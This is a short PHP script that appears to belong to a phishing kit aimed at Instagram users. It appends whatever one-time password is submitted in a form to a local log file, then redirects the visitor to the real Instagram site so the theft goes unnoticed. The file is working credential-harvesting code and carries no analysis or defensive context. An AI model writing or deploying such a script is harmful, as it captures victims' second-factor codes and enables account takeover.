1<?php 2 3file_put_contents("log.txt", " OTP: " . $_POST['OTP'] . "\n", FILE_APPEND); 4header('Location: https://www.instagram.com'); 5exit(); 6 7